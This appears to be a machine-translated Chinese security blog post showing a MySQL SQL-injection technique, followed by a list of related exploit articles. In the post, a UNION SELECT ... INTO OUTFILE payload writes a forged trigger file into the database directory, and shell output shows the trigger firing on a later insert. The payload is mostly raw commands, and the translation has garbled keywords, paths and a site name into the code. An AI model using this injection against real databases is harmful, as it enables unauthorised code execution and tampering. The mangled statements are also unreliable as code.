文/ superhei
当时一直没有去测试,今天测试了一下,记录一下
递减aa.article;
+ ----------- + -------------- + ------ + ----- + --------- + ---------------- +
|场|类型| NULL |重点|默认|额外|
+ -------- --- + -------------- + ------ + ----- + --------- + -------- -------- +
| articleid | INT(11)|号|优先级| NULL | AUTO_INCREMENT |
|标题| VARCHAR(100)|号| | | |
内容|文字|否| |空| |
+ ----------- + -------------- + ------ + ----- + --------- + ---------------- +
3行集(0.01秒)
执行语句:
SELECT *从文章articleid = 3和1 = 2 UNION SELECT NULL,NULL,'类型=触发器“成OUTFILE
'的/ var / lib中/ MySQL的/ AA / article.TRG“线端”\ ntriggers = \'的CREATE DEFINER的'根'@'本地主机'用户插入的每一行后触发ATK \ \ nbegin \ \ n选择1111到OUTFILE
选择*从文章里articleid = 3和1 = 2 UNION SELECT NULL,NULL,'型=触发INTO OUTFILE
- >'/ VAR / LIB / MYSQL / AA / article.TRG“线端”\ ntriggers = \'创作DEFINER的'根'@'本地主机'用户插入的每一行后触发ATK \ \ nbegin \ \ n选取1111 INTO OUTFILE
(0.04秒)确定,1行受影响的
本地文件:
根@的Ubuntu :/ VAR / LIB / MYSQL / AA#猫article.TRG
\ n \ N型触发器
触发器='创建DEFINER的'根'@'本地主机'触发攻击后,www.xuhantao.com,用户每一行的插入\ nbegin \ n选取1111 INTO OUTFILE
LS / tmp / aa.txt文件中
LS:无法访问的/ tmp / aa.txt文件:没有那个文件或目录
回到mysql的外壳下执行:
MySQL的>插入到文章(articleid,标题,涛涛电脑知识网,内容)值(20,2,3);
1行受影响(0.00秒)查询确定,
再看看文件:
根@ Ubuntu的:/ VAR / LIB / MYSQL / AA上#ls / tmp / aa.txt文件中
的/ tmp / aa.txt文件
的根的Ubuntu :/ VAR / lib目录/ MYSQL / AA#猫
:)
MySQL堆积查询的与SQL注入
时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:
相关文章
- 没有相关文章
本类热门
- 05-19·记事狗2.5.0鸡肋注入漏洞
- 05-19·动易xss拿站小记
- 04-19·记一次有趣的提权
- 04-19·TNTHK小组内部版后门解析
- 05-19·新版百度空间存储型XSS
- 04-19·ecmall 2.3.0-0918-scgbk注入及修复
- 05-19·Z-Blog1.8绕过权限漏洞
- 05-19·ThinkPHP最新版3.0RC1存在XSS漏洞
- 04-19·Wordpree插件评论啦代码审计不严
- 04-19·绕过CDN查找真实IP的思路,一个新颖并另类的方法
本类推荐
- 05-19·IIS7.5畸形解析拿shell利用方法
- 05-19·从对一个安全产品的测试看产品架构安全
- 05-19·mysql被降权提权思路
- 05-19·记一次win2003垃圾提权
本类固顶
- 暂无信息
网站备案号:蒙ICP备15000590号-1